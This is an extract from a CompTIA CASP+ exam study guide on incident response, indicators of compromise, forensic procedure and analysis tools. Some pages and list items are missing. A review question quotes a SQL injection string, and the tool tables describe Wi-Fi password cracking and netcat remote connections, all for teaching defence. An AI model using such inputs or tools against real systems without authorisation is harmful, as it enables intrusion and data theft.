potential damage that can be done if an
end-user is successfully attacked.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
304 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
3
Vulnerabilities
Answer the following questions:
https://www.foo.com/products/jsessionid=8858PNRX949WM
26378/?item=bigscreen-tv
What is problematic with this?
5. What type of attack is most closely associated with the use of characters
such as ’ OR 'x' = 'x' -- ?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 305
Topic 12B
Identifying and Responding to
Indicators of Compromise
6
It is easy to observe a person that is skilled in their own craft and to lose sight of the
time and effort it takes to gain expertise. Highly successful teams and organizations
generally represent the outputs of dedicated and well-managed individuals who
have worked tirelessly over many years to achieve great things. In many ways,
incident response can be correlated to these things. Developing capabilities to
quickly identify and respond to security incidents takes advanced knowledge
and skill but is also dependent upon properly architected infrastructure and fully
implemented cyber tools. Incident response sounds straightforward on the surface
but represents a stress test for defensive cybersecurity operations. Quickly and
efficiently identifying incidents, knowing how to respond to them, and allowing an
organization to maintain operations in the face of continuous adversarial actions is
the defining characteristic of incident response.
Collecting log information is not enough, logs must be actively reviewed and analyzed.If
being breached is not bad enough, identifying that evidence of pre-breach activities were
contained within logs (that were not properly reviewed) will likely increase the liability of
senior leadership.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
306 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Using a host means that only traffic directed at that host is captured. Capturing from
a network segment can be performed by a switched port analyzer (SPAN) port (or
mirror port). This means that a network switch is configured to copy frames passing
over designated source ports to a destination port, which the packet sniffer is
connected to. Sniffing can also be performed over a network cable segment by using
a test access port (TAP). This means that a device is inserted in the cabling to copy
frames passing over it. There are passive and active (powered) versions.
Typically, sniffers are placed inside a firewall or close to a server of particular
importance. The idea is usually to identify malicious traffic that has managed to
get past the firewall. A single sniffer can generate an exceptionally large amount of
data, so you cannot just put multiple sensors everywhere in the network without
provisioning the resources to manage them properly. Depending on network size
and resources, one or just a few sensors will be deployed to monitor key assets or
network paths.
tcpdump command is a command line packet capture utility for Linux (linux.die.
net/man/8/tcpdump). The basic syntax of the command is tcpdump -i eth0,
where eth0 is the interface to listen on. The utility will then display captured
packets until halted manually (Ctrl+C). Frames can be saved to a .pcap file using
the -w option. Alternatively, you can open a pcap file using the -r option.
tcpdump is often used with some sort of filter expression to reduce the number
of frames that are captured:
• Type—filter by host, net, port, or portrange.
• or (||)
• not (!)
Filter syntax can be made even more detailed by using parentheses to group
expressions. A complex filter expression should be enclosed by quotes. For
example, the following command filters frames to those with the source IP
10.1.0.100 and destination port 53 or 80:
tcpdump -i eth0 “src host 10.1.0.100 and (dst port 53
or dst port 80)”
Wireshark (wireshark.org) is an open-source graphical packet capture and analysis
utility, with installer packages for most operating systems. Having chosen the
interface to listen on, the output is displayed in a three-pane view. The packet
list pane shows a scrolling summary of frames. The packet details pane shows
expandable fields in the frame currently selected from the packet list. The packet
bytes pane shows the raw data from the frame in hex and ASCII. Wireshark is capable
of parsing (interpreting) the headers and payloads of hundreds of network protocols.
You can apply a capture filter using the same expression syntax as tcpdump
(though the expression can be built via the GUI tools too). You can save the output
to a .pcap file or load a file for analysis. Wireshark supports very powerful display
filters (wiki.wireshark.org/DisplayFilters) that can be applied to a live capture
or to a capture file. You can also adjust the coloring rules (wiki.wireshark.org/
ColoringRules), which control the row shading and font color for each frame.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 307
• Forwarded Events—events that are sent to the local log from other hosts
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
308 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Logs Description
Network logs Network logs are generated by
appliances such as routers, firewalls,
switches, and access points. Log files will
record the operation and status of the
appliance itself—the system log for the
appliance—plus traffic and access logs
recording network behavior, such as a
host trying to use a port that is blocked
by a firewall, or an endpoint trying to use
multiple MAC addresses when connected
to a switch.
Access logs Authentication attempts for each host
are written to the security log. Also,
inspecting logs from servers authorizing
logons, such as RADIUS and TACACS+
servers or Windows Active Directory (AD)
servers can reveal patterns of behavior
or identify account abuse or misuse.
Access logs, when appropriately
configured, can also record access
attempts to individual files and folders.
Vulnerability logs A vulnerability scan report is another
important source when determining how
an attack might have occurred. The scan
engine might log or alert when a scan
report contains vulnerabilities. The report
can be analyzed to identify vulnerabilities
that have not been patched or
configuration weaknesses that have not
been remediated. These can be correlated
to recently developed exploits.
Netflow logs Data captured from network sensors/
sniffers plus netflow sources provides
both summary statistics about bandwidth
and protocol usage and the opportunity
for detailed frame analysis.
NetFlow
A flow collector is a means of recording metadata and statistics about network
traffic rather than recording each frame. Network traffic and flow data may come
from a wide variety of sources (or probes), such as switches, routers, firewalls, web
proxies, and so forth. Flow analysis tools can provide features such as:
• Highlighting trends and patterns in traffic generated by particular applications,
hosts, and ports.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 309
• Any account activity representing access or actions which should not be possible
using the identified account
• Suspicious changes to the Windows registry or any unusual change to system files
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
310 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
• Traffic originating from countries where the organization does not operate or
have any business dealings
• Alerts from IDS/IPS, firewalls, endpoint protection, or any other security tools
• Any activity on a system that indicates remote access/control that is not expected
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 311
strings used to correlate indicators, and the actions that a detected event should
trigger. Use cases are identified and constructed through threat modeling but, in
general terms, you should try to capture at least the five Ws:
• When the event started (and ended, if relevant).
• What happened, with specific detail to distinguish the nature of the event from
other events.
• Where it happened—on which host, file system, network port, and so forth.
• Where the event originated (for example, a session initiated from an outside IP
address over a VPN connection).
SIEM helps security analysts, it does not replace the work they do.SIEMs should help
make security analysis more efficient and effective.
IDS/IPS
An IDS/IPS creates a log entry each time a rule is matched. Depending on the
configuration, the rule might also trigger an alert action or perform active
notification, via email for instance. One of the most significant challenges in
deploying an IDS is tuning the system to avoid overalerting, without reducing
sensitivity so much that genuine incidents are missed. Most IDS software will
provide numerous options for output. To take Snort as an example, some of the
output formats include:
• Unified output—This creates machine-readable binary files. This is fast but
requires an interpreter for a human to read.
• Comma separated values (CSV)—This uses character delimiters for fields and
contents, making it easier to import into third-party applications or parse using
regular expressions.
• Tcpdump—This uses the pcap file format to record the packets underlying the
event.
These can also be directed to a file or to a database log server, such as a security
information and event management (SIEM) system. Alerts should be monitored
in real time using a console app or dashboard, with analysts determining whether
each alert requires escalation to incident status.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
312 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
• Endpoint agents—to enforce policy on client computers, even when they are
not connected to the network
DLP agents scan content in structured formats, such as a database with a formal
access control model, or unstructured formats, such as email or word processing
documents. A file cracking process is applied to unstructured data to render it in
a consistent scannable format. The transfer of content to removable media, such
as USB devices, or by email, instant messaging, or even social media, can then
be blocked if it does not conform to a predefined policy. Most DLP solutions can
extend the protection mechanisms to cloud storage services, using either a proxy to
mediate access or the cloud service provider’s API to perform scanning and policy
enforcement.
Remediation is the action the DLP software takes when it detects a policy violation.
The following remediation mechanisms are typical:
• Alert only—The copying is allowed, but the management system records an
incident and may alert an administrator.
• Block—The user is prevented from copying the original file but retains access to
it. The user may or may not be alerted to the policy violation, but it will be logged
as an incident by the management engine.
• Quarantine—Access to the original file is denied to the user (or possibly any
user). This might be accomplished by encrypting the file in place or by moving it
to a quarantine area in the file system.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 313
Antivirus (AV)
Like any type of automated intrusion detection, endpoint detection and response
(EDR) requires tuning to reduce false positives. Rules that generate alerts that do
not actually require an analyst’s attention can be changed to log only or disabled
completely.
If previously unknown malware is identified through threat hunting techniques,
this information should be transformed into actionable intelligence to enable
quick and efficient detection on other systems. This threat intelligence information
may also be shared through a community or industry portal. One basic method of
doing this is to upload the malware binary to an analysis portal, such as virustotal.
com. Prior to sharing this information, work should be completed to eradicate the
malware from the environment. Adversaries monitor community threat intelligence
sites to identify whether custom malware has been identified and uploaded. Doing
so provides advance warning that their actions have been identified and are at
elevated risk of being exposed. Samples can also be submitted to product vendors
for closer (and closed) analysis.
Based on the characteristics of the malware, custom signatures and detection rules
can be developed. Antivirus vendors have developed various proprietary systems
for classifying and naming malware within their final product, but some tools also
allow for the creation of custom rules. A common example of custom rules are
YARA rules and a more detailed description of these is available at https://blog.
malwarebytes.com/security-world/technology/2017/09/explained-yara-rules/.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
314 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
programs will be able to quickly identify, respond, and thwart adversarial moves.
Organizations lacking a well-developed program are generally characterized by an
identification of attack months after initial breach, widespread catastrophic impacts
and cumbersome, chaotic responses. In some regards, incident response can be
considered as “game day” where all the education, training, and practices come
together in a single stretch of time.
Some important infrastructure elements to leverage when responding to a valid IOC
include:
• Firewall rules—Making changes to firewall rules to block traffic based on
static rules or allowing firewall rules to be dynamically updated based on traffic
characteristics contained in alerts generated by SIEM and/or IDS tools
• DLP rules—Updating DLP rules to report or block actions that attempt to move
or use data. For example, identifying specific data types or content being moved
to a specific location or network address.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 315
The lack of a clear plan regarding what constitutes an urgent situation or knowledge
of what to do when it is identified will result in problems being stuck in ticket
queues or bogged down in bureaucracy while an adversary furthers the impacts of
their attack.
Event Classifications
A false positive is something that is identified by an assessment tool as an issue,
when in fact it is not. Researching the issue costs time and effort and, if excessive
false positives are generated, it becomes tempting to disregard the information
entirely, which could lead to larger problems.
False negatives, that is, potential issues that are not identified. These are
particularly concerning as they represent a missed alert on something truly
concerning.
True positive and true negative refer to accurate alerts whereby a true positive
is an actual security alert and a true negative is simply informational and not
indicative of an immediate problem, although the item may be useful for future
analysis.
Too many false positives perpetuate operator fatigue and can make the work of security
analysis repetitive and stressful, potentially impacting the effectiveness of security
operations.
Communication Plan
A secure method of communication between the members of the CSIRT is essential
for managing incidents successfully. The team may require “out-of-band” or “off-
band” channels that cannot be intercepted. In a major intrusion incident, using
corporate email or VoIP runs the risk that the adversary will be able to intercept
communications. One obvious method is via cellphones, but these only support
voice and text messaging. For file and data exchange, there should be a messaging
system with end-to-end encryption, such as Off-the-Record (OTR), Signal, or
WhatsApp, or an external email system with message encryption (S/MIME or PGP).
These need to use digital signatures and encryption keys from a system that is
separate to the identity management processes of the network being defended.
Once a security incident has occurred, communication is key to carrying out the
plans your organization has developed for such cases. Having a set process for
escalating communication will facilitate the knowledge and teamwork needed to
resolve the incident and bring the organization’s operations back to normal. The
CSIRT should have a single point-of-contact to handle requests and questions from
stakeholders outside the incident response team, including both executives within
the company and contacts external to the company.
Steps must be taken to prevent the inadvertent release of information beyond
the team authorized to handle the incident. Status and event details should be
circulated on a need-to-know basis and only to trusted parties identified on a call
list. Trusted parties might include both internal and external stakeholders. It may
not be appropriate for all members of the CSIRT to be informed about all incident
details. It is imperative that adversaries not be alerted to detection and remediation
measures about to be taken against them. It is not helpful for an incident to be
publicized in the press or through social media outside of planned communications.
Ensure that parties with privileged information do not release this information to
untrusted parties, whether intentionally or inadvertently.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
316 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Stakeholder Management
Given the communication plan, incident responses will typically require
coordination between different internal departments and with external agencies,
such as law enforcement and regulators. Outside of the nominated incident
handlers, there are many different trusted parties with many distinct roles that
could possibly be involved in an incident. The following are some examples of
internal and external stakeholders that will likely be relevant to any incident
response:
• Senior Leadership
• Legal Council
• Law Enforcement
• Regulators
Each of these groups will require different levels of information and varying degrees
of detail. Communications for each of these stakeholders will need to accommodate
their different perspectives and pressing informational needs.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 317
Additional Information
NIST Computer Security Incident Handling Guide SP 800-61
https://csrc.nist.gov/publications/detail/sp/800-61/rev-2/final
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
318 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Response Methods
Identifying IOCs is the first step in incident response, what happens next is highly
dependent upon what tools are in place. Incorporating high levels of automation
is an important goal for IT operations in general and definitely in terms of
security operations. Two common measures of incident response capability
can be drawn from measuring the time span between attack and detection and
detection and response or remediation. Automation tools add the characteristic
speed and efficiency attributes associated with computers to incident response
capabilities.
Automated responses can be as simple as scheduled tasks designed to look for
predefined attributes, such as log file entries, data content matches, or output from
scripted tasks. These methods can be highly effective at detecting change and can
include additional steps to change the environment in response. For example, a
scheduled task could use a regular expression to search for sensitive data stored in
files (such as account numbers or PII) and then move or delete the file to protect its
contents from exposure.
A more sophisticated implementation involves the use of Security Orchestration
Automation and Response (SOAR) platforms which are typically integrated with
SIEM and can link various security event types to a sequence of automated steps
defined within a runbook. A SOAR platform can leverage the work done by SIEM to
process log data and identify events and then proceed to perform the next steps
that may typically be required of a human analyst. Due to the fact that the next
steps are well-defined and must be followed as standard operating procedure in
response to an identified incident, they can be “programmed” into the SOAR which
can perform the steps and document the work performed. The SOAR can proceed
through steps using a flowchart whereby next-steps are contingent upon the
outputs of the previous step. Any events that cannot be resolved by the SOAR are
then forwarded for manual review by a human analyst. SOAR can reduce operator
fatigue by handling some of the mundane pre-processing activities that are a
requirement when analyzing any event and also reduce incident workflows from
hours to minutes.
The following chart includes some of the elements included in the response to
some common incidents. Most event types can be more effectively managed when
all or some of the responses include automation.
Scenario Description
Ransomware A ransomware playbook describes the
people, processes, and tools, to be
employed during such an event and
should include considerations for
determining which systems were
impacted, methods by which impacted
systems can be immediately isolated,
and an identification and engagement
with the people needed in the response.
Ransomware responses should include
disconnecting and isolating networks
as quickly as possible. It is preferable to
disconnect systems as opposed to
powering off in order to maintain
forensic integrity as well as potentially
being able to extract cryptographic keys
from system memory which can be used
for remediation.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 319
Scenario Description
Data Exfiltration Used in response to an adversary that
has targeted, copied, and transferred
sensitive data. Data exfiltration can use
many avenues, from literal movement
of data files to less obvious examples
such as is accomplished via SQL injection
attack. Data exfiltration playbooks include
the specific and necessary tasks needed
in response to data exfiltration, including
notification requirements and system and
network forensic analysis to determine
exactly what was accessed. Sometimes
analysis can reveal the locations where
data was copied which can help in
response decisions. Deleting copies
of data on an adversary’s system is
considered to be a hack-back action
and may only offer limited mitigation
depending on whether additional copies
of the data exist.
Social Engineering A social engineering playbook often
involves responses in relation to an
identified, phishing email. As soon as a
suspicious email is identified an official
notice should be broadcast to advise
of the attack and to encourage others
who may have responded to the email
to step-forward. In parallel, the phishing
email should be searched for within the
entire email system to identify any other
instances and any elements within the
email (such as dynamic body content,
hyperlinks, and/or attachments) should
be analyzed within a sandbox to fully
understand what the message is
designed to do. Information extracted
from sandbox analysis can be used to
feed security infrastructure such as
blocking access to IP addresses and URLs
as well as crafting updated detection
rules in IDS, AV, etc. At a bare minimum,
impacted individuals should have their
passwords reset and possibly also have
their desktop systems replaced.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
320 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Additional Resources
CISA MS-ISAC Ransomware Guide
https://www.cisa.gov/sites/default/files/publications/CISA_MS-ISAC_
Ransomware%20Guide_S508C.pdf
Center for Internet Security Ransomware: Facts, Threats, and
Countermeasures
https://www.cisecurity.org/blog/ransomware-facts-threats-and-countermeasures/
The Open Source Cybersecurity Playbook
https://www.isecom.org/Open-Source-Cybersecurity-Playbook.pdf
theHive Project Cortex
https://thehive-project.org/#section_cortex
Palo Alto’s SOAR platform
https://apps.paloaltonetworks.com/marketplace/demisto
Splunk Phantom SOAR platform
https://www.splunk.com/en_us/software/splunk-security-orchestration-and-
automation.html
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 321
Review Activity:
7
Indicators of Compromise
Answer the following questions:
2. Two alerts are generated by an IDS, one with a priority value of 1 and the
other with a priority value of 10. Which should be investigated first?
3. Which security product is most likely to support the use of YARA rules?
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
322 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Topic 12C
Exploring Digital Forensic Concepts
6
Digital forensics represents a specialty field within a specialty field and there are
volumes of books dedicated to the craft. Sometimes it is enough to know that
specialists are needed and to outsource the work to those who are fully qualified.
Regardless, understanding the concepts surrounding the digital forensics field is
very important. Forensic investigations may form part of an organization’s security
operations in order to help evaluate that third-party software operates in a safe
way, other times forensic capabilities may be needed to better understand how
a malware or phishing attack were designed to work in order to support incident
capabilities. In the most extreme case, digital forensics may be needed to support
criminal investigations. All of these scenarios require an understanding of digital
forensic tools and techniques in order to support successful outcomes.
a) Ensure that the scene is safe. Threat to life or injury takes precedence
over evidence collection.
2. Collection
a) Ensure authorization to collect the evidence using tools and methods that
will withstand legal scrutiny.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 323
3. Analysis
a) Create a copy of evidence for analysis, ensuring that the copy can be
related directly to the primary evidence source. The integrity of evidence
copies are verified by generating hashes of the files on a recurring basis in
order to detect any unintended changes.
4. Reporting/Presentation
a) Create a report of the methods and tools used and present findings
and conclusions in accordance to the specific reporting requirements
necessary (and dependent upon the type of incident).
Chain of Custody
The chain of custody is the record of evidence handling from collection through
presentation in court. The evidence can be hardware components, electronic data,
or telephone systems. The chain of custody documentation reinforces the integrity
and proper custody of evidence from collection, to analysis, to storage, and finally
to presentation. When security breaches go to trial, the chain of custody protects an
organization against accusations that evidence has either been tampered with or is
different than it was when it was collected. Every person in the chain who handles
evidence must log the methods and tools they used.
Physical devices taken from the crime scene should be identified, bagged, sealed,
and labeled. Tamper-proof bags (most vendors prefer the term “tamper-evident”)
cannot be opened and then resealed covertly. It is also appropriate to ensure
that the bags have antistatic shielding to reduce the possibility that data will be
damaged or corrupted on the electronic media by electrostatic discharge (ESD).
Criminal cases or internal security audits can take months or years to resolve.
You must be able to preserve all the gathered evidence in a proper manner for
a lengthy period. Computer hardware is prone to wear and tear, and important
storage media like hard disks can even fail when used normally, or when not used
at all. A failure of this kind may mean the corruption or loss of your evidence, both
of which may have severe repercussions for your investigation. You should also
be careful when selecting where to physically store this hardware. Rooms without
proper climate controls will increase the risk of hardware failure, especially if these
electronics overheat.
Evidence can also become overwhelming by its sheer size and scope, and therefore
it is important to create metadata that accurately defines characteristics about
digital evidence, such as its type, the date it was collected and hashed, and its
purpose. A major incident may generate large quantities of evidence. A consistent
naming scheme for labeling archive boxes and evidence bags must be established
early in the process. The naming scheme could use a combination of date and time
of collection (use a yyyy-mm-dd:hh:mm format rather than leading with day or
month), case number, and evidence type.
Lastly, evidence rooms should have proper physical controls like locks, guards,
surveillance cameras, visitor logs, and other access controls. Additionally, digital
evidence may warrant forensically-sound imaging techniques to be used, not only
for investigative purposes but also as backups, so long as they are protected with
the same measures as the original evidence.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
324 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Data Acquisition
Data acquisition is the process of obtaining a forensically clean copy of data from
a device held as evidence. If the computer system or device is not owned by the
organization, there is the question of whether search or seizure is legally valid.
This impacts bring-your-own-device (BYOD) policies. For example, if an employee is
accused of fraud, you must verify that the employee’s equipment and data can be
legally seized and searched. Any mistake you may make with evidence gained from
the search is inadmissible.
Data acquisition is also complicated by the fact that it is more difficult to capture
evidence from a digital “crime scene” than it is from a physical one. Some evidence
will be lost if the computer system is powered off; on the other hand, some
evidence may be unobtainable until the system is powered off. Additionally,
evidence may be lost depending on whether the system is shut down or “frozen” by
suddenly disconnecting the power.
Data acquisition usually proceeds by using a tool to make an image from the
data held on the target device. An image can be acquired from either volatile or
nonvolatile storage and a snapshot of memory (memory dump) can be captured
to aid in later analysis. The general principle is to capture evidence in the order
of volatility, from more volatile to less volatile. The ISOC best practice guide to
evidence collection and archiving, published as tools.ietf.org/html/rfc3227, sets out
the general order as follows:
1. CPU registers and cache memory (including cache on disk controllers, GPUs,
and so on)
3. Data on persistent mass storage devices (HDDs, SSDs, and flash memory
devices)—including file system and free space
6. Archival media
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 325
Evidence Preservation
The host devices and media taken from the crime scene should be labeled, bagged,
and sealed, using tamper-evident bags. It is also appropriate to ensure that the
bags have anti-static shielding to reduce the possibility that data will be damaged
or corrupted on the electronic media by electrostatic discharge (ESD). Each piece of
evidence should be documented by a chain of custody form which records where,
when, and who collected the evidence, who subsequently handled it, and where it
was stored.
The evidence should be stored in a secure facility; this not only means access
control, but also environmental control, so that the electronic systems are not
damaged by condensation, ESD, fire, and other hazards. Similarly, if the evidence is
transported, the transport must also be secure.
Forensics Workstation
A digital forensics kit contains the software and hardware tools required to acquire
and analyze evidence from system memory dumps and mass storage file systems.
Digital forensics software is designed to assist the collection and analysis of digital
evidence. Most of the commercial forensics tools are available for the Windows
platform only.
• EnCase Forensic is a digital forensics case management product created by
Guidance Software (guidancesoftware.com/encase-forensic?cmpid=nav_r). Case
management is assisted by built-in pathways, or workflow templates, showing
the key steps in diverse types of investigation. In addition to the core forensics
suite, there are separate products for eDiscovery (digital evidence management)
and Endpoint Investigator (for over the network analysis of corporate desktops
and servers).
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
326 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Tool Description
foremost This is a Linux-based forensic data
recovery utility that uses file carving
techniques to extract deleted or
corrupted data from a disk partition.
It is able to recover data that has no
underlying file system. Foremost is a
command-line utility that was originally
created to be used by law enforcement
but is open source and can be applied to
any forensic investigation
strings A command line utility used to extract text
strings used within a binary file that would
otherwise be difficult to identify using
manual methods. Identifying the test
strings used in a binary file can reveal
important attributes regarding the internal
structure of the program, including code
comments, variable names, libraries, and
other pertinent information. The strings
utility can also be used to collect
information from memory, in Linux
issuing the command sudo strings
/dev/mem will show string values
currently present in system memory.
Tool Description
hexdump The hexdump utility can also be used to
extract data from binary files and can
display the contents in hexadecimal,
decimal, octal, or ASCII formats. hexdump
inspection is often part of data recovery
and/or reverse engineering processes.
Issuing the command hexdump
--canonical against a file of interest
can reveal the file’s MIME type, date of
creation, date of access, and other
pertinent information.
Ghidra An open source software tool originally
developed by the NSA. Ghidra is written in
Java and shares many of the same
features and functionality found in the IDA
Pro tool (which requires the purchase of a
license). Ghidra is intended to be used
for reverse engineering tasks and is
most closely associated with reverse
engineering malware. Ghidra is available
from https://ghidra-sre.org/.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 327
Tool Description
GNU Project debugger (GDB) GNU Project debugger (GDB) is a tool
which can be used to identify what is
occurring within an application while
it is running. GNU Project debugger
(GDB) can analyze programs written
in several languages, including C/C++,
Objective-C, Fortran, and Assembly.
GDB can be used to analyze how code
runs, at a low level, as well as identify
shared libraries loaded by the program,
including the address space that was
used to load them. GDB can be used to
step-through the flow of an application
by using breakpoints and watchpoints to
pause operation.
OllyDbg OllyDbg is a debugger, like GDB, but is
focused on Microsoft Windows and in-
cludes a graphical user interface.OllyDbg
can reveal information regarding the
internal structures and operation of an
application without having access to its
source code.
readelf When compiled, source code produces an
object file that is used to run the program
defined by the code. The object file is
read and executed by the computer by
following structures within the object
file. An example of the structures within
the object file include ELF, Executable
and Linkable Format, which can be read
by readelf. readelf can identify
important information about the file and
how it was constructed and is useful for
reverse engineering tasks.
objdump Similar to readelf, objdump can be
used to analyze object files and includes
a disassembler to reveal the assembler
commands used by the program.
strace The strace tool can be used to identify
interactions between processes and the
Linux kernel. These interactions can be
monitored and/or modified in order to
deconstruct how an application operates
when its source code is not available.
ldd The ldd utility can be used to display a
program’s dependencies.For example,
issuing the command sudo ldd /
sbin/poweroff displays all of the
shared libraries required by the Linux
poweroff command
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
328 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Tool Description
file A simple but very useful command, file
displays the type of a file by inspecting
its content. All files include “magic bytes”
which can accurately identify the type of
a file. The file utility will compare the
magic bytes of a file to a list of known
magic bytes to determine its type. If the
magic bytes do not clearly identify the
type, file will examine the file to
determine if it is a text file and identify
if it represents a particular encoding
format or programming language.
The ghidra application inspecting the Linux kernel object file (Screenshot courtesy of
National Security Agency.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 329
This high, flat graph generated by the binwalk utility indicates that the
inspected file is compressed, obfuscated, and/or encrypted
(Screenshot with permission from ReFirmLabs/binwalk.)
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
330 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Nmap default scan listing open ports from within the default range. (Screenshot Nmap nmap.org.)
Aircrack-ng
Aircrack-ng represents a suite of tools designed for the assessment and analysis
of Wi-Fi security. Aircrack-ng can be used to monitor, attack, test, or crack Wi-Fi
networks. Some of the utilities included with the suite include:
• aircrack-ng—used to crack passwords contained within packet captures
(obtained using airodump-ng)
Volatility
volatility is a command line tool used to perform memory analysis.
volatility can be used to explore the contents of a memory dump and reveal
information such as running processes, open sockets, passwords, the contents
of the clipboard, and many other items contained within memory. Some sample
memory dump files are available from https://github.com/volatilityfoundation/
volatility/wiki/Memory-Samples, each of which represent memory captures from
various systems and include details and evidence of real world malware infection.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 331
Hashing Utilities
Utility Description
sha256sum A linux command line utility designed
to generate SHA-2 hashes with a digest
length of 256 bits.
ssdeep Commonly used by antivirus programs,
ssdeep is designed to compare files
to identify matches. This is useful to
identify functionally identical files that
may be developed to morph and/or
obfuscate themselves in order to avoid
detection using strict hash matching
techniques. ssdeep utilizes context
triggered piecewise hashing (CTPH).
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
332 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Tool Description
netstat A command line utility designed to
display current network connections and
their state. netstat can be useful to
identify suspicious connections or active
listening ports, both of which may be
indicative of infection.
ps ps (process status) command can be
used to display currently running
processes on a Linux system, including
the process ID (PID) terminal from which
they are running, the user running the
command, and other useful information.
vmstat vmstat is a command line utility
designed to display real-time information
about system memory, running processes,
interrupts, paging, and I/O statistics.
lsof lsof (list open files) displays currently
open files and the names of the
associated processes.
netcat netcat is an extremely useful utility that
can be used to read and write from
network connections using either TCP
or UDP. netcat is a small, lightweight,
and highly extensible utility and is a
favorite tool among adversaries. It can
be used to transmit data and open
remote connections and is easily
incorporated into scripts.
conntrack conntrack allows for interactions
with the connection tracking systems,
which is the Linux kernel module
designed to enable stateful packet
inspection for the iptables firewall.
conntrack can be used to show,
delete, and/or update table entries or
listen to flow events. Issuing the
command sudo conntrack -L
will display current flow information on
the current system’s firewall traffic.
tcpdump tcpdump is a command line utility for
performing packet analysis.tcpdump can
record packet captures and save them
using the pcap interface so they can be
used by other tools.
Wireshark Wireshark is a very versatile, cross-
platform packet analysis tool which
includes a wide range of features and
functionality for the capture and
analysis of network traffic. Wireshark
is an indispensable tool used in the
analysis of security incidents!
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 333
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
334 | The Official CompTIA CASP+ Student Guide (Exam CAS-004)
Review Activity:
5
Digital Forensic Concepts
Answer the following questions:
2. Which utility can be used to extract data from binary files and can
display the contents in hexadecimal, decimal, octal, or ASCII formats
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
The Official CompTIA CASP+ Student Guide (Exam CAS-004) | 335
Lesson 12
Summary
6
Key Takeaways
• Analyzing software vulnerabilities requires specialized tools and knowledge.
• Digital forensics is highly specialized work and uses a wide assortment of tools
and techniques.
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
LICENSED FOR USE ONLY BY: MICHAEL LOPUT · 56581152 · JUL 22 2024
Appendix A
Mapping Course Content to
